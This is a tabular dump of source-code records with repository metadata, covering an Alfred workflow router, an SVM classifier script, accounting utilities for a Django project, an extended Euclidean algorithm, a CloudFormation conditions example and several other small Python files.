hexsha (stringlengths 40-40) | size (int64 5-2.06M) | ext (stringclasses, 10 values) | lang (stringclasses, 1 value) | max_stars_repo_path (stringlengths 3-248) | max_stars_repo_name (stringlengths 5-125) | max_stars_repo_head_hexsha (stringlengths 40-78) | max_stars_repo_licenses (listlengths 1-10) | max_stars_count (int64 1-191k ⌀) | max_stars_repo_stars_event_min_datetime (stringlengths 24-24 ⌀) | max_stars_repo_stars_event_max_datetime (stringlengths 24-24 ⌀) | max_issues_repo_path (stringlengths 3-248) | max_issues_repo_name (stringlengths 5-125) | max_issues_repo_head_hexsha (stringlengths 40-78) | max_issues_repo_licenses (listlengths 1-10) | max_issues_count (int64 1-67k ⌀) | max_issues_repo_issues_event_min_datetime (stringlengths 24-24 ⌀) | max_issues_repo_issues_event_max_datetime (stringlengths 24-24 ⌀) | max_forks_repo_path (stringlengths 3-248) | max_forks_repo_name (stringlengths 5-125) | max_forks_repo_head_hexsha (stringlengths 40-78) | max_forks_repo_licenses (listlengths 1-10) | max_forks_count (int64 1-105k ⌀) | max_forks_repo_forks_event_min_datetime (stringlengths 24-24 ⌀) | max_forks_repo_forks_event_max_datetime (stringlengths 24-24 ⌀) | content (stringlengths 5-2.06M) | avg_line_length (float64 1-1.02M) | max_line_length (int64 3-1.03M) | alphanum_fraction (float64 0-1) | count_classes (int64 0-1.6M) | score_classes (float64 0-1) | count_generators (int64 0-651k) | score_generators (float64 0-1) | count_decorators (int64 0-990k) | score_decorators (float64 0-1) | count_async_functions (int64 0-235k) | score_async_functions (float64 0-1) | count_documentation (int64 0-1.04M) | score_documentation (float64 0-1) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c78a9dbe76748ffc4b552241c18002c06e087035 | 1,920 | py | Python | workflow/src/routing.py | mibexsoftware/alfred-stash-workflow | 5cdba4d14c8998b937c1aa6af8e3417251fac540 | [
"MIT"
]
| 13 | 2016-03-31T16:19:59.000Z | 2019-09-26T20:47:57.000Z | workflow/src/routing.py | mibexsoftware/alfred-stash-workflow | 5cdba4d14c8998b937c1aa6af8e3417251fac540 | [
"MIT"
]
| 6 | 2015-09-18T15:24:43.000Z | 2019-10-23T16:51:39.000Z | workflow/src/routing.py | mibexsoftware/alfred-stash-workflow | 5cdba4d14c8998b937c1aa6af8e3417251fac540 | [
"MIT"
]
| 3 | 2015-09-16T18:05:32.000Z | 2020-01-04T19:41:21.000Z | # -*- coding: utf-8 -*-
from src import icons, __version__
from src.actions import HOST_URL
from src.actions.configure import ConfigureWorkflowAction
from src.actions.help import HelpWorkflowAction
from src.actions.index import IndexWorkflowAction
from src.actions.projects import ProjectWorkflowAction
from src.actions.pull_requests import PullRequestWorkflowAction
from src.actions.repositories import RepositoryWorkflowAction
from src.util import workflow, call_alfred
WORKFLOW_ACTIONS = {
':config': ConfigureWorkflowAction,
':projects': ProjectWorkflowAction,
':repos': RepositoryWorkflowAction,
':pullrequests': PullRequestWorkflowAction,
':help': HelpWorkflowAction
}
def route(args): # e.g., args = ":config sethost http://localhost,--exec"
command_string = args[0] # :config sethost http://localhost
command = command_string.split(' ')
if not workflow().settings.get(HOST_URL, None) and 'sethost' not in command:
call_alfred('stash:config sethost ')
return
handler = IndexWorkflowAction
action = next(iter(command), None)
if action:
handler = WORKFLOW_ACTIONS.get(action, IndexWorkflowAction)
if '--exec' in args:
handler().execute(command, cmd_pressed='--cmd' in args, shift_pressed='--shift' in args)
else: # show menu
handler().menu(command)
_notify_if_upgrade_available()
workflow().send_feedback()
def _notify_if_upgrade_available():
if workflow().update_available:
new_version = workflow().cached_data('__workflow_update_status', max_age=0)['version']
workflow().add_item('An update is available!',
'Update the workflow from version {} to {}'.format(__version__, new_version),
arg=':config update',
valid=True,
icon=icons.UPDATE)
| 39.183673 | 105 | 0.678125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 352 | 0.183333 |
c78c8acd4546ee0e8cf65b0df48d4a928c3e7481 | 1,262 | py | Python | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
]
| 2 | 2020-10-02T03:01:32.000Z | 2020-12-06T09:21:06.000Z | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
]
| null | null | null | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
]
| null | null | null | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import classification_report, confusion_matrix
from mlxtend.plotting import plot_decision_regions
# from sklearn import datasets
from pandas.plotting import scatter_matrix
from joblib import dump, load
import collections
kaggle_data = pd.read_csv('data/kaggle.csv')
data = pd.read_csv('data/new_data.csv')
kaggle_X = kaggle_data.iloc[:, :30].values
X = data.drop(['index'],axis=1).iloc[:, :30].values
y = data.iloc[:,-1].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.99)
kaggle_X_train, kaggle_X_test, kaggle_y_train, kaggle_y_test = train_test_split(X, y, test_size = 0.02)
svclassifier = SVC(kernel='poly',degree=5)
svclassifier.fit(kaggle_X_train, kaggle_y_train)
dump(svclassifier, 'pre_model.joblib')
y_pred = svclassifier.predict(X_test)
print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
# print("X=%s, Predicted=%s" % (test_2d, y_pred_test[0]))
# print(y_pred.shape)
# TESTING ZONE
X = [[-1,1,0,-1,-1,-1,1,0,-1,1,1,-1,0,0,-1,-1,-1,-1,0,1,0,0,0,-1,1,1,1,1,-1,-1]]
print("PREDICTION:",svclassifier.predict(X))
| 33.210526 | 103 | 0.759113 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 202 | 0.160063 |
c78d0f81c7f3ce50a968bb140ed1caaa45e4bf4b | 547 | py | Python | PE032.py | CaptainSora/Python-Project-Euler | 056400f434eec837ece5ef06653b310ebfcc3d4e | [
"MIT"
]
| null | null | null | PE032.py | CaptainSora/Python-Project-Euler | 056400f434eec837ece5ef06653b310ebfcc3d4e | [
"MIT"
]
| null | null | null | PE032.py | CaptainSora/Python-Project-Euler | 056400f434eec837ece5ef06653b310ebfcc3d4e | [
"MIT"
]
| null | null | null | from itertools import count
from _pandigital_tools import is_pandigital
def pand_products():
"""
Returns the sum of all numbers n which have a factorization a * b = n such
that a, b, n are (cumulatively) 1 through 9 pandigital.
"""
total = set()
for a in range(2, 100):
for b in count(a):
if len(str(a) + str(b) + str(a * b)) > 9:
break
elif is_pandigital(a, b, a * b):
total.add(a * b)
return sum(total)
def solve(vol=0):
return pand_products()
| 23.782609 | 78 | 0.570384 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 150 | 0.274223 |
c78d62ba8abdde61ef2fb89e7ca95a09bbcfc5d2 | 282 | py | Python | v1/models.py | jdubansky/openstates.org | 6fd5592aae554c4bb201f0a76ed3605bff5204c2 | [
"MIT"
]
| 1 | 2022-01-17T11:54:28.000Z | 2022-01-17T11:54:28.000Z | v1/models.py | washabstract/openstates.org | dc541ae5cd09dd3b3db623178bf32a03d0246f01 | [
"MIT"
]
| null | null | null | v1/models.py | washabstract/openstates.org | dc541ae5cd09dd3b3db623178bf32a03d0246f01 | [
"MIT"
]
| null | null | null | from django.db import models
from openstates.data.models import Bill
class LegacyBillMapping(models.Model):
legacy_id = models.CharField(max_length=20, primary_key=True)
bill = models.ForeignKey(
Bill, related_name="legacy_mapping", on_delete=models.CASCADE
)
| 28.2 | 69 | 0.758865 | 210 | 0.744681 | 0 | 0 | 0 | 0 | 0 | 0 | 16 | 0.056738 |
c78e2f38914cd69e3bd290dd0efeba4071626991 | 14,594 | py | Python | corehq/apps/accounting/utils.py | satyaakam/commcare-hq | 233f255ff20ab3a16013e9fdfdb9c1dcf632e415 | [
"BSD-3-Clause"
]
| null | null | null | corehq/apps/accounting/utils.py | satyaakam/commcare-hq | 233f255ff20ab3a16013e9fdfdb9c1dcf632e415 | [
"BSD-3-Clause"
]
| 1 | 2021-06-02T04:45:16.000Z | 2021-06-02T04:45:16.000Z | corehq/apps/accounting/utils.py | satyaakam/commcare-hq | 233f255ff20ab3a16013e9fdfdb9c1dcf632e415 | [
"BSD-3-Clause"
]
| null | null | null | import datetime
import logging
from collections import defaultdict, namedtuple
from django.conf import settings
from django.template.loader import render_to_string
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from django_prbac.models import Grant, Role, UserRole
from corehq.const import USER_DATE_FORMAT
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.dates import add_months
from corehq import privileges
from corehq.apps.accounting.exceptions import (
AccountingError,
ProductPlanNotFoundError,
)
from corehq.apps.domain.models import Domain
from corehq.util.quickcache import quickcache
from corehq.util.view_utils import absolute_reverse
logger = logging.getLogger('accounting')
EXCHANGE_RATE_DECIMAL_PLACES = 9
def log_accounting_error(message, show_stack_trace=False):
logger.error("[BILLING] %s" % message, exc_info=show_stack_trace)
def log_accounting_info(message):
logger.info("[BILLING] %s" % message)
def months_from_date(reference_date, months_from_date):
year, month = add_months(reference_date.year, reference_date.month, months_from_date)
return datetime.date(year, month, 1)
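# Worked example: months_from_date(datetime.date(2020, 11, 15), 3)
# -> datetime.date(2021, 2, 1); the result always snaps to the first of the month.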
def ensure_domain_instance(domain):
if not isinstance(domain, Domain):
domain = Domain.get_by_name(domain)
return domain
def fmt_feature_rate_dict(feature, feature_rate=None):
"""
This will be turned into a JSON representation of this Feature and its FeatureRate
"""
if feature_rate is None:
feature_rate = feature.get_rate()
return {
'name': feature.name,
'feature_type': feature.feature_type,
'feature_id': feature.id,
'rate_id': feature_rate.id,
'monthly_fee': str(feature_rate.monthly_fee),
'monthly_limit': feature_rate.monthly_limit,
'per_excess_fee': str(feature_rate.per_excess_fee),
}
def fmt_product_rate_dict(product_name, product_rate=None):
"""
This will be turned into a JSON representation of this SoftwareProductRate
"""
from corehq.apps.accounting.models import SoftwareProductRate
if product_rate is None:
try:
product_rate = SoftwareProductRate.objects.filter(
is_active=True,
name=product_name,
).latest('date_created')
except SoftwareProductRate.DoesNotExist:
product_rate = SoftwareProductRate.objects.create(name=product_name, is_active=True)
return {
'name': product_rate.name,
'rate_id': product_rate.id,
'monthly_fee': str(product_rate.monthly_fee),
}
def get_privileges(plan_version):
role = plan_version.role.get_cached_role()
return set([grant.to_role.slug for grant in role.memberships_granted.all()])
ChangeStatusResult = namedtuple('ChangeStatusResult', ['adjustment_reason', 'downgraded_privs', 'upgraded_privs'])
def get_change_status(from_plan_version, to_plan_version):
from_privs = (
get_privileges(from_plan_version)
if from_plan_version is not None
else set(privileges.MAX_PRIVILEGES)
)
to_privs = get_privileges(to_plan_version) if to_plan_version is not None else set()
downgraded_privs = from_privs.difference(to_privs)
upgraded_privs = to_privs
from corehq.apps.accounting.models import SubscriptionAdjustmentReason as Reason
if from_plan_version is None:
adjustment_reason = Reason.CREATE
else:
adjustment_reason = Reason.SWITCH
if len(downgraded_privs) == 0 and len(upgraded_privs) > 0:
adjustment_reason = Reason.UPGRADE
elif len(upgraded_privs) == 0 and len(downgraded_privs) > 0:
adjustment_reason = Reason.DOWNGRADE
return ChangeStatusResult(adjustment_reason, downgraded_privs, upgraded_privs)
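# Worked example (illustrative): switching from a plan granting {a, b} to one
# granting {a, b, c} gives downgraded_privs == set() and upgraded_privs ==
# {'a', 'b', 'c'}, so the adjustment_reason resolves to Reason.UPGRADE.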
def domain_has_privilege_cache_args(domain, privilege_slug, **assignment):
return [
domain.name if isinstance(domain, Domain) else domain,
privilege_slug
]
@quickcache(domain_has_privilege_cache_args, timeout=10)
def domain_has_privilege(domain, privilege_slug, **assignment):
from corehq.apps.accounting.models import Subscription
try:
plan_version = Subscription.get_subscribed_plan_by_domain(domain)
privilege = Role.get_privilege(privilege_slug, assignment)
if privilege is None:
return False
if plan_version.role.has_privilege(privilege):
return True
except ProductPlanNotFoundError:
return False
except AccountingError:
pass
return False
@quickcache(['domain_name'], timeout=15 * 60)
def domain_is_on_trial(domain_name):
from corehq.apps.accounting.models import Subscription
subscription = Subscription.get_active_subscription_by_domain(domain_name)
return subscription and subscription.is_trial
def is_active_subscription(date_start, date_end, today=None):
today = today or datetime.date.today()
return ((date_start is None or date_start <= today)
and (date_end is None or today < date_end))
def has_subscription_already_ended(subscription):
return (subscription.date_end is not None
and subscription.date_end <= datetime.date.today())
def get_money_str(amount):
if amount is not None:
if amount < 0:
fmt = "-$%0.2f"
amount = abs(amount)
else:
fmt = "$%0.2f"
return fmt % amount
return ""
def get_address_from_invoice(invoice):
from corehq.apps.accounting.invoice_pdf import Address
from corehq.apps.accounting.models import BillingContactInfo
try:
contact_info = BillingContactInfo.objects.get(
account=invoice.account,
)
return Address(
name=(
"%s %s" %
(contact_info.first_name
if contact_info.first_name is not None else "",
contact_info.last_name
if contact_info.last_name is not None else "")
),
company_name=contact_info.company_name,
first_line=contact_info.first_line,
second_line=contact_info.second_line,
city=contact_info.city,
region=contact_info.state_province_region,
postal_code=contact_info.postal_code,
country=contact_info.country,
)
except BillingContactInfo.DoesNotExist:
return Address()
def get_dimagi_from_email():
return ("Dimagi CommCare Accounts <%(email)s>" % {
'email': settings.INVOICING_CONTACT_EMAIL,
})
def quantize_accounting_decimal(decimal_value):
return "%0.2f" % decimal_value
def fmt_dollar_amount(decimal_value):
return _("USD %s") % quantize_accounting_decimal(decimal_value)
def get_customer_cards(username, domain):
from corehq.apps.accounting.models import (
StripePaymentMethod, PaymentMethodType,
)
import stripe
try:
payment_method = StripePaymentMethod.objects.get(
web_user=username,
method_type=PaymentMethodType.STRIPE
)
stripe_customer = payment_method.customer
return dict(stripe_customer.cards)
except StripePaymentMethod.DoesNotExist:
pass
except stripe.error.AuthenticationError:
if not settings.STRIPE_PRIVATE_KEY:
log_accounting_info("Private key is not defined in settings")
else:
raise
return None
def is_accounting_admin(user):
accounting_privilege = Role.get_privilege(privileges.ACCOUNTING_ADMIN)
if accounting_privilege is None:
return False
try:
return user.prbac_role.has_privilege(accounting_privilege)
except (AttributeError, UserRole.DoesNotExist):
return False
def make_anchor_tag(href, name, attrs=None):
context = {
'href': href,
'name': name,
'attrs': attrs or {},
}
return render_to_string('accounting/partials/anchor_tag.html', context)
def get_default_domain_url(domain):
from corehq.apps.domain.views.settings import DefaultProjectSettingsView
return absolute_reverse(
DefaultProjectSettingsView.urlname,
args=[domain],
)
def ensure_grants(grants_to_privs, dry_run=False, verbose=False, roles_by_slug=None):
"""
Adds a parameterless grant between grantee and priv, looked up by slug.
:param grants_to_privs: An iterable of two-tuples:
`(grantee_slug, priv_slugs)`. Will only be iterated once.
"""
dry_run_tag = "[DRY RUN] " if dry_run else ""
if roles_by_slug is None:
roles_by_slug = {role.slug: role for role in Role.objects.all()}
granted = defaultdict(set)
for grant in Grant.objects.select_related('from_role', 'to_role').all():
granted[grant.from_role.slug].add(grant.to_role.slug)
grants_to_create = []
for grantee_slug, priv_slugs in grants_to_privs:
if grantee_slug not in roles_by_slug:
logger.info('grantee %s does not exist.', grantee_slug)
continue
for priv_slug in priv_slugs:
if priv_slug not in roles_by_slug:
logger.info('privilege %s does not exist.', priv_slug)
continue
if priv_slug in granted[grantee_slug]:
if verbose or dry_run:
logger.info('%sPrivilege already granted: %s => %s',
dry_run_tag, grantee_slug, priv_slug)
else:
granted[grantee_slug].add(priv_slug)
if verbose or dry_run:
logger.info('%sGranting privilege: %s => %s',
dry_run_tag, grantee_slug, priv_slug)
if not dry_run:
grants_to_create.append(Grant(
from_role=roles_by_slug[grantee_slug],
to_role=roles_by_slug[priv_slug]
))
if grants_to_create:
Role.get_cache().clear()
Grant.objects.bulk_create(grants_to_create)
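# Usage sketch (the slugs below are hypothetical, not from this module):
#   ensure_grants([('accounting_admin', ['privilege_a', 'privilege_b'])],
#                 dry_run=True)
# logs the Grant rows that would be created without writing them; with
# dry_run=False the missing grants are bulk-created and the Role cache cleared.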
def log_removed_grants(priv_slugs, dry_run=False):
grants = Grant.objects.filter(to_role__slug__in=list(priv_slugs))
if grants:
logger.info("%sRemoving privileges: %s",
("[DRY RUN] " if dry_run else ""),
", ".join(g.to_role.slug for g in grants),
)
def get_account_name_from_default_name(default_name):
from corehq.apps.accounting.models import BillingAccount
if not BillingAccount.objects.filter(name=default_name).exists():
return default_name
else:
matching_regex_count = BillingAccount.objects.filter(
name__iregex=r'^%s \(\d+\)$' % default_name,
).count()
return '%s (%d)' % (
default_name,
matching_regex_count + 1
)
def cancel_future_subscriptions(domain_name, from_date, web_user):
from corehq.apps.accounting.models import (
Subscription,
SubscriptionAdjustment,
SubscriptionAdjustmentReason,
)
for later_subscription in Subscription.visible_objects.filter(
subscriber__domain=domain_name,
date_start__gt=from_date,
).order_by('date_start').all():
later_subscription.date_end = later_subscription.date_start
later_subscription.save()
SubscriptionAdjustment.record_adjustment(
later_subscription,
reason=SubscriptionAdjustmentReason.CANCEL,
web_user=web_user,
note="Cancelled due to changing subscription",
)
def pause_current_subscription(domain_name, web_user, current_subscription):
from corehq.apps.accounting.models import (
Subscription,
DefaultProductPlan,
SoftwarePlanEdition,
SubscriptionAdjustmentMethod,
SubscriptionType,
ProBonoStatus,
FundingSource,
)
cancel_future_subscriptions(domain_name, datetime.date.today(), web_user)
paused_plan_version = DefaultProductPlan.get_default_plan_version(
SoftwarePlanEdition.PAUSED
)
if current_subscription.is_below_minimum_subscription:
current_subscription.update_subscription(
date_start=current_subscription.date_start,
date_end=current_subscription.date_start + datetime.timedelta(days=30)
)
return Subscription.new_domain_subscription(
account=current_subscription.account,
domain=domain_name,
plan_version=paused_plan_version,
date_start=current_subscription.date_start + datetime.timedelta(days=30),
web_user=web_user,
adjustment_method=SubscriptionAdjustmentMethod.USER,
service_type=SubscriptionType.PRODUCT,
pro_bono_status=ProBonoStatus.NO,
funding_source=FundingSource.CLIENT,
do_not_invoice=True,
no_invoice_reason='Paused plan',
)
else:
return current_subscription.change_plan(
paused_plan_version,
web_user=web_user,
adjustment_method=SubscriptionAdjustmentMethod.USER,
service_type=SubscriptionType.PRODUCT,
pro_bono_status=ProBonoStatus.NO,
do_not_invoice=True,
no_invoice_reason='Paused plan',
)
def is_downgrade(current_edition, next_edition):
from corehq.apps.accounting.models import SoftwarePlanEdition
plans = SoftwarePlanEdition.SELF_SERVICE_ORDER + [SoftwarePlanEdition.ENTERPRISE]
return plans.index(current_edition) > plans.index(next_edition)
def clear_plan_version_cache():
from corehq.apps.accounting.models import SoftwarePlan
for software_plan in SoftwarePlan.objects.all():
SoftwarePlan.get_version.clear(software_plan)
def get_paused_plan_context(request, domain):
from corehq.apps.accounting.models import Subscription
from corehq.apps.domain.views import SelectPlanView
current_sub = Subscription.get_active_subscription_by_domain(domain)
if (not current_sub
or not current_sub.plan_version.is_paused
or not current_sub.previous_subscription):
return {}
previous_edition = (current_sub.previous_subscription.plan_version.plan.edition
if current_sub.previous_subscription else "")
return {
'is_paused': True,
'previous_edition': previous_edition,
'paused_date': current_sub.date_start.strftime(USER_DATE_FORMAT),
'change_plan_url': reverse(SelectPlanView.urlname, args=[domain]),
'can_edit_billing_info': request.couch_user.is_domain_admin(domain),
}
| 34.419811 | 114 | 0.688434 | 0 | 0 | 0 | 0 | 849 | 0.058175 | 0 | 0 | 1,226 | 0.084007 |
c78ed3281b65fd17334bed8b20f794b80892e233 | 802 | py | Python | RSA/Algorithm/EEA.py | Pumpkin-NN/Cryptography | 968e3f55fcc6a02d0badeec157776ca8f07607b8 | [
"MIT"
]
| null | null | null | RSA/Algorithm/EEA.py | Pumpkin-NN/Cryptography | 968e3f55fcc6a02d0badeec157776ca8f07607b8 | [
"MIT"
]
| null | null | null | RSA/Algorithm/EEA.py | Pumpkin-NN/Cryptography | 968e3f55fcc6a02d0badeec157776ca8f07607b8 | [
"MIT"
]
| null | null | null |
def extended_euclidean_algorithm(a, b):
    # Standard iterative extended Euclidean algorithm: maintain the
    # remainder sequence together with the Bezout coefficients so that
    # a * s + b * t == r holds for every (r, s, t) triple along the way.
    old_r, r = a, b
    old_s, s = 1, 0
    old_t, t = 0, 1
    while r > 0:
        # Quotient of the current division step
        q = old_r // r
        # Advance the remainder and both coefficient sequences
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
        old_t, t = t, old_t - q * t
    # old_t is the coefficient of b, i.e. a*old_s + b*old_t == gcd(a, b);
    # when gcd(a, b) == 1 it is the inverse of b modulo a (as used in RSA)
    return old_t
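if __name__ == '__main__':
    # Usage sketch (an assumption, not part of the original file):
    # 7 * 23 = 161 = 4 * 40 + 1, so 23 is the inverse of 7 modulo 40.
    print(extended_euclidean_algorithm(40, 7) % 40)  # -> 23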
| 23.588235 | 57 | 0.438903 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 209 | 0.260599 |
c790959983852e5ff5dc7391f5d9c3bf229bac12 | 435 | py | Python | hci/command/commands/le_apcf_commands/apcf_service_data.py | cc4728/python-hci | d988f69c55972af445ec3ba04fd4cd1199593d10 | [
"MIT"
]
| 3 | 2021-12-16T14:32:45.000Z | 2022-01-25T03:10:48.000Z | hci/command/commands/le_apcf_commands/apcf_service_data.py | cc4728/python-hci | d988f69c55972af445ec3ba04fd4cd1199593d10 | [
"MIT"
]
| null | null | null | hci/command/commands/le_apcf_commands/apcf_service_data.py | cc4728/python-hci | d988f69c55972af445ec3ba04fd4cd1199593d10 | [
"MIT"
]
| 1 | 2022-01-25T03:10:50.000Z | 2022-01-25T03:10:50.000Z | from ..le_apcf_command_pkt import LE_APCF_Command
from struct import pack, unpack
from enum import IntEnum
"""
This part is based on the spec <<Android BT HCI Requirement for BLE feature>> v0.52
APCF: Advertising Packet Content Filter
"""
class APCF_Service_Data(LE_APCF_Command):
def __init__(self):
# TODO generate cmd
super().__init__()
def __str__(self):
return super().__str__()+''.join(['{}']).format("") | 25.588235 | 75 | 0.698851 | 204 | 0.468966 | 0 | 0 | 0 | 0 | 0 | 0 | 147 | 0.337931 |
c790fdff7571a6a4a1222a967671954a3b60828b | 1,468 | py | Python | source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 3b990e5fd92543f7152b4a2c8e689e771578c047 | [
"Apache-2.0"
]
| 178 | 2016-09-21T19:51:28.000Z | 2021-09-07T17:37:06.000Z | source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 3b990e5fd92543f7152b4a2c8e689e771578c047 | [
"Apache-2.0"
]
| null | null | null | source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 3b990e5fd92543f7152b4a2c8e689e771578c047 | [
"Apache-2.0"
]
| 17 | 2016-10-21T02:11:13.000Z | 2020-10-07T19:11:54.000Z | """
DocumentNGramSymWinGraph.py
Created on May 23, 2017, 4:56 PM
"""
import networkx as nx
import pygraphviz as pgv
import matplotlib.pyplot as plt
from networkx.drawing.nx_agraph import graphviz_layout
from DocumentNGramGraph import DocumentNGramGraph
class DocumentNGramSymWinGraph(DocumentNGramGraph):
# an extension of DocumentNGramGraph
# for symmetric windowing
def buildGraph(self,verbose = False, d=[]):
# set Data @class_variable
self.setData(d)
Data = self._Data
# build ngram
ng = self.build_ngram()
s = len(ng)
# calculate window
win = self._Dwin//2
# initialize graph
self._Graph = nx.Graph()
if(s>=2 and win>=1):
# max possible window size (bounded by win)
o = min(win,s)+1
window = ng[1:o]
i = o
# first build the full window
for gram in ng[0:s-1]:
for w in window:
self.addEdgeInc(gram,w)
window.pop(0)
                # once the window has reached the end
                # of ng, stop appending new grams
if i<s:
window.append(ng[i][:])
i+=1
# print Graph (optional)
if verbose:
self.GraphDraw(self._GPrintVerbose)
return self._Graph
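# Usage sketch (assumes the inherited DocumentNGramGraph constructor supplies
# default n-gram and window sizes; not part of the original file):
#   g = DocumentNGramSymWinGraph()
#   graph = g.buildGraph(d="a man a plan a canal")
#   print(graph.number_of_nodes(), graph.number_of_edges())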
| 26.690909 | 55 | 0.52248 | 1,195 | 0.814033 | 0 | 0 | 0 | 0 | 0 | 0 | 380 | 0.258856 |
c791642581cbd1a8e05d99ab1f306e65029dc666 | 2,212 | py | Python | examples/EC2Conditions.py | DrLuke/troposphere | 05672a2b0cf87215dbd6a2a656669e0d3c92d0e5 | [
"BSD-2-Clause"
]
| 1 | 2021-04-03T22:24:36.000Z | 2021-04-03T22:24:36.000Z | examples/EC2Conditions.py | cartermeyers/troposphere | 4b42fa0d65f73cec28184b5349aa198fb8ee5b2e | [
"BSD-2-Clause"
]
| 1 | 2021-06-25T15:20:46.000Z | 2021-06-25T15:20:46.000Z | examples/EC2Conditions.py | cartermeyers/troposphere | 4b42fa0d65f73cec28184b5349aa198fb8ee5b2e | [
"BSD-2-Clause"
]
| 5 | 2020-05-10T13:50:32.000Z | 2021-09-09T09:06:54.000Z | from __future__ import print_function
from troposphere import (
Template, Parameter, Ref, Condition, Equals, And, Or, Not, If
)
from troposphere import ec2
parameters = {
"One": Parameter(
"One",
Type="String",
),
"Two": Parameter(
"Two",
Type="String",
),
"Three": Parameter(
"Three",
Type="String",
),
"Four": Parameter(
"Four",
Type="String",
),
"SshKeyName": Parameter(
"SshKeyName",
Type="String",
)
}
conditions = {
"OneEqualsFoo": Equals(
Ref("One"),
"Foo"
),
"NotOneEqualsFoo": Not(
Condition("OneEqualsFoo")
),
"BarEqualsTwo": Equals(
"Bar",
Ref("Two")
),
"ThreeEqualsFour": Equals(
Ref("Three"),
Ref("Four")
),
"OneEqualsFooOrBarEqualsTwo": Or(
Condition("OneEqualsFoo"),
Condition("BarEqualsTwo")
),
"OneEqualsFooAndNotBarEqualsTwo": And(
Condition("OneEqualsFoo"),
Not(Condition("BarEqualsTwo"))
),
"OneEqualsFooAndBarEqualsTwoAndThreeEqualsPft": And(
Condition("OneEqualsFoo"),
Condition("BarEqualsTwo"),
Equals(Ref("Three"), "Pft")
),
"OneIsQuzAndThreeEqualsFour": And(
Equals(Ref("One"), "Quz"),
Condition("ThreeEqualsFour")
),
"LaunchInstance": And(
Condition("OneEqualsFoo"),
Condition("NotOneEqualsFoo"),
Condition("BarEqualsTwo"),
Condition("OneEqualsFooAndNotBarEqualsTwo"),
Condition("OneIsQuzAndThreeEqualsFour")
),
"LaunchWithGusto": And(
Condition("LaunchInstance"),
Equals(Ref("One"), "Gusto")
)
}
resources = {
"Ec2Instance": ec2.Instance(
"Ec2Instance",
Condition="LaunchInstance",
        ImageId=If("OneEqualsFoo", "ami-12345678", "ami-87654321"),
InstanceType="t1.micro",
KeyName=Ref("SshKeyName"),
SecurityGroups=["default"],
)
}
t = Template()
for p in parameters.values():
t.add_parameter(p)
for k in conditions:
t.add_condition(k, conditions[k])
for r in resources.values():
t.add_resource(r)
print(t.to_json())
| 22.343434 | 77 | 0.573689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 767 | 0.346745 |
c79252ab386af5d00249bc02769ec35279e30201 | 768 | py | Python | fist_phase/08_objects.py | kapuni/exercise_py | b60ba8462d2545cae57483bcb0b3428b03c5d522 | [
"MIT"
]
| null | null | null | fist_phase/08_objects.py | kapuni/exercise_py | b60ba8462d2545cae57483bcb0b3428b03c5d522 | [
"MIT"
]
| null | null | null | fist_phase/08_objects.py | kapuni/exercise_py | b60ba8462d2545cae57483bcb0b3428b03c5d522 | [
"MIT"
]
| null | null | null | class Student(object):
    # __init__ is a special method used to initialize a newly created object
    # Here it binds the name and age attributes to the student object
    def __init__(self, name, age):
        self.name = name
        self.age = age
    def study(self, course_name):
        print('%s is studying %s.' % (self.name, course_name))
    # PEP 8 wants identifiers in all lowercase with words joined by underscores,
    # but some programmers and companies prefer camelCase naming instead
    def watch_movie(self):
        if self.age < 18:
            print('%s can only watch the cartoon "Boonie Bears".' % self.name)
        else:
            print('%s is watching an adult movie.' % self.name)
def main():
    # Create a student object with a given name and age
    stu1 = Student('骆昊', 38)
    # Send a study message to the object
    stu1.study('Python Programming')
    # Send a watch_movie message to the object
    stu1.watch_movie()
    stu2 = Student('王大锤', 15)
    stu2.study('Moral Education')
    stu2.watch_movie()
if __name__ == '__main__':
main() | 23.272727 | 53 | 0.605469 | 728 | 0.67658 | 0 | 0 | 0 | 0 | 0 | 0 | 552 | 0.513011 |
c79307bf6012742aa0a7a562893d0160e400a873 | 1,108 | py | Python | lrtc_lib/data/load_dataset.py | MovestaDev/low-resource-text-classification-framework | 4380755a65b35265e84ecbf4b87e872d79e8f079 | [
"Apache-2.0"
]
| 57 | 2020-11-18T15:13:06.000Z | 2022-03-28T22:33:26.000Z | lrtc_lib/data/load_dataset.py | MovestaDev/low-resource-text-classification-framework | 4380755a65b35265e84ecbf4b87e872d79e8f079 | [
"Apache-2.0"
]
| 5 | 2021-02-23T22:11:07.000Z | 2021-12-13T00:13:48.000Z | lrtc_lib/data/load_dataset.py | MovestaDev/low-resource-text-classification-framework | 4380755a65b35265e84ecbf4b87e872d79e8f079 | [
"Apache-2.0"
]
| 14 | 2021-02-10T08:55:27.000Z | 2022-02-23T22:37:54.000Z | # (c) Copyright IBM Corporation 2020.
# LICENSE: Apache License 2.0 (Apache-2.0)
# http://www.apache.org/licenses/LICENSE-2.0
import logging
from lrtc_lib.data_access import single_dataset_loader
from lrtc_lib.data_access.processors.dataset_part import DatasetPart
from lrtc_lib.oracle_data_access import gold_labels_loader
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s')
def load(dataset: str, force_new: bool = False):
for part in DatasetPart:
dataset_name = dataset + '_' + part.name.lower()
# load dataset (generate Documents and TextElements)
